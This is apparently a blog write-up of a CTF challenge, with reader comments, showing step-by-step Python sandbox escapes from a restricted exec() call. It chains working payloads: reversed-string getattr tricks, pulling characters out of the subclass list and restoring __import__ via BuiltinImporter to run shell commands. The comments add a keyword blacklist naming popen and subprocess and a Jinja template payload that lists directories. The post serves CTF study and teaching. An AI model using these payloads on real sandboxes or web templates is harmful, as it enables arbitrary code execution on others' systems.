Several CTF Challenges involve Python Sandbox Escapes.
In essence, you're allowed to run a small piece of Python code, often being run by Pythons "exec" function which simply executes any code given to it.
With no restrictions, you can simply go:
>>> import os; os.system('whoami');
reelix
The "whoami" is simply a proof of concept. You can run any linux command from there, so you can alter files, create a reverse shell, and so on.
So they then limit the ability to use spaces so you can't do the import. You can bypass that by using one of Pythons builtin functions and going:
__import__('os').system('whoami');
So they then limit it further. No spaces, but now you're not allowed to use the words "import", "os", or "system" - Either Uppercase, or Lowercase. You can bypass that by converting the required words to strings, reversing them, and calling them directly, and go:
getattr(getattr(__builtins__,'__tropmi__'[::-1])('so'[::-1]),'metsys'[::-1])('whoami');
And that's about as far as most get. In a recent CTF however, I had all the above restrictions, but now no builtins (No __import__ or __builtins__), or quotes either!
Aside from the quote removal, the challenge was:
exec('Your Input Here', {'__builtins__': None, 'print':print});
Getting Letters
Python doesn't require the entire string to be together, so you can go:
>>> import os; os.system('who'+'am'+'i');
reelix
In addition, you can assign these to variables, so you can go:
>>> wordwhoami='w'+'ho'+'ami';import os;os.system(wordwhoami);
reelix
So, first, I needed some way to be able to get some letters.
If you run:
().__class__.__base__.__subclasses__();
It splits out every base class that Python3 has:
>>> ().__class__.__base__.__subclasses__();
[<class 'type'>, <class 'weakref'>, <class 'weakcallableproxy'>, <class 'weakproxy'>, <class 'int'>, <class 'bytearray'>, <class 'bytes'>, <class 'list'>, <class 'NoneType'>, <class 'NotImplementedType'>, <class 'traceback'>, <class 'super'>, <class 'range'>, <class 'dict'>, <class 'dict_keys'>, <class 'dict_values'>, <class 'dict_items'>, <class 'dict_reversekeyiterator'>, <class 'dict_reversevalueiterator'>, <class 'dict_reverseitemiterator'>, <class 'odict_iterator'>, <class 'set'>, <class 'str'>, <class 'slice'>, <class 'staticmethod'>, <class 'complex'>, <class 'float'>, <class 'frozenset'>, <class 'property'>, <class 'managedbuffer'>, <class 'memoryview'>, <class 'tuple'>, <class 'enumerate'>, <class 'reversed'>, <class 'stderrprinter'>, <class 'code'>, <class 'frame'>, <class 'builtin_function_or_method'>, <class 'method'>, <class 'function'>, <class 'mappingproxy'>, <class 'generator'>, <class 'getset_descriptor'>, <class 'wrapper_descriptor'>, <class 'method-wrapper'>, <class 'ellipsis'>, <class 'member_descriptor'>, <class 'types.SimpleNamespace'>, <class 'PyCapsule'>, <class 'longrange_iterator'>, <class 'cell'>, <class 'instancemethod'>, <class 'classmethod_descriptor'>, <class 'method_descriptor'>, <class 'callable_iterator'>, <class 'iterator'>, <class 'pickle.PickleBuffer'>, <class 'coroutine'>, <class 'coroutine_wrapper'>, <class 'InterpreterID'>, <class 'EncodingMap'>, <class 'fieldnameiterator'>, <class 'formatteriterator'>, <class 'BaseException'>, <class 'hamt'>, <class 'hamt_array_node'>, <class 'hamt_bitmap_node'>, <class 'hamt_collision_node'>, <class 'keys'>, <class 'values'>, <class 'items'>, <class 'Context'>, <class 'ContextVar'>, <class 'Token'>, <class 'Token.MISSING'>, <class 'moduledef'>, <class 'module'>, ......
Well, this list of classes has letters in it, right? So lets use those!
We can't just use these letters directly, as it's a list of objects and not a string, so we need to convert that list to a string to be able to get access to the individual characters.
Whilst we can't just use str like you normally would since str is one of the builtin classes that were stripped, that list of classes has <class 'str'> in it at position 22 - So let's use that instead!
>>> ().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__());
"[<class 'type'>, <class 'weakref'>, <class 'weakcallableproxy'>, <class 'weakproxy'>, <class 'int'>, <class 'bytearray'>, <class 'bytes'>, <class 'list'>, <class 'NoneType'>, <class 'NotImplementedType'>, <class 'traceback'>, <class 'super'>, <class 'range'>, <class 'dict'>, <class 'dict_keys'>, <class 'dict_values'>, <class 'dict_items'>, <class 'dict_reversekeyiterator'>, <class 'dict_reversevalueiterator'>, <class 'dict_reverseitemiterator'>, <class 'odict_iterator'>, <class 'set'>, <class 'str'>, <class 'slice'>, <class 'staticmethod'>, <class 'complex'>, <class 'float'>, <class 'frozenset'>, <class 'property'>, <class 'managedbuffer'>, <class 'memoryview'>, <class 'tuple'>, <class 'enumerate'>, <class 'reversed'>, <class 'stderrprinter'>, <class 'code'>, <class 'frame'>, <class 'builtin_function_or_method'>, <class 'method'>, <class 'function'>, <class 'mappingproxy'>, <class 'generator'>, <class 'getset_descriptor'>, <class 'wrapper_descriptor'>, <class 'method-wrapper'>, <class 'ellipsis'>, <class 'member_descriptor'>, <class 'types.SimpleNamespace'>, <class 'PyCapsule'>, <class 'longrange_iterator'>, <class 'cell'>......
And, since it's now a string, we can simply use the positional index to pluck out specific characters!
We need an "o" and an "s" for "os". The "s" we can get from the word "class" at the start at index 5, and the "o" we can get from "NoneType" at index 164. So, to print "os" we can go:
>>> ().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[164]+().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[5];
'os'
Let's assign them some variables so it's easier to use them later.
>>> charo=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[164];
chars=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[5];
charo+chars;
'os'
Getting __import__ back
Now I was stuck for awhile. I couldn't just any of the builtin classes since they were stripped, so I couldn't run __import__ to import the "os" I had just created - Now what!
After extensive searching, I came across this link showing that the base class "_frozen_importlib.BuiltinImporter" had a .load_module method that could get the builtins back!
Similar to how we used the "str" method to convert our original list to a string, we can call this method by its index in our base list (At position 84), and construct the text it required for the .load_module method from a list of indexed characters!
>>> charb=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[53];
>>> charu=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[235];
>>> chari=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[94];
>>> charl=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[51];
>>> chart=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[9];
>>> charn=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[95];
>>> chars=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[5];
>>> ().__class__.__bases__[0].__subclasses__()[84]().load_module(charb+charu+chari+charl+chart+chari+charn+chars).__import__;
<built-in function __import__>
And now we have our __import__ back! Hurrah!
Putting it all together
Now we just need to add the missing characters for the rest, neaten it up a bit, and we're done - Full code execution!
>>> charb=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[53];
>>> charu=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[235];
>>> chari=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[94];
>>> charl=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[51];
>>> chart=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[9];
>>> charn=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[95];
>>> chars=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[5];
>>> charo=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[164];
>>> charw=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[25];
>>> charh=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[540];
>>> chara=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[4];
>>> charm=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[187];
>>> bi=().__class__.__bases__[0].__subclasses__()[84]().load_module(charb+charu+chari+charl+chart+chari+charn+chars);
>>> bi.__import__(charo+chars).system(charw+charh+charo+chara+charm+chari);
reelix
this is just beautiful
ReplyDeletewow can i ask which ctf was this challange in?
ReplyDeleteThis was from the "Build yourself in" challenge from the HackTheBox Cyber Apocalypse 2021 CTF.
Deletehow i can bypass if only alphabet and "_" allowed?
ReplyDeleteOnly azAZ_ ? Not quite sure. Without a ., a [], or a () you might have an issue, and I can't say I've encountered that before.
DeleteYou could try start with __builtins__ or __import__ to see if you get anything and go from there.
I'd be interested to know if you come up with a solution for this!
thanks for the explanation
ReplyDeletenow how if it blacklists these ["\"", "'", "|", "[", "]", "class", "subclasses", "config", "url_for", "request", "builtins", "popen", "subprocess"]
how you bypass that i only manage to look the directory files with {{lipsum._globals_.os.listdir()}}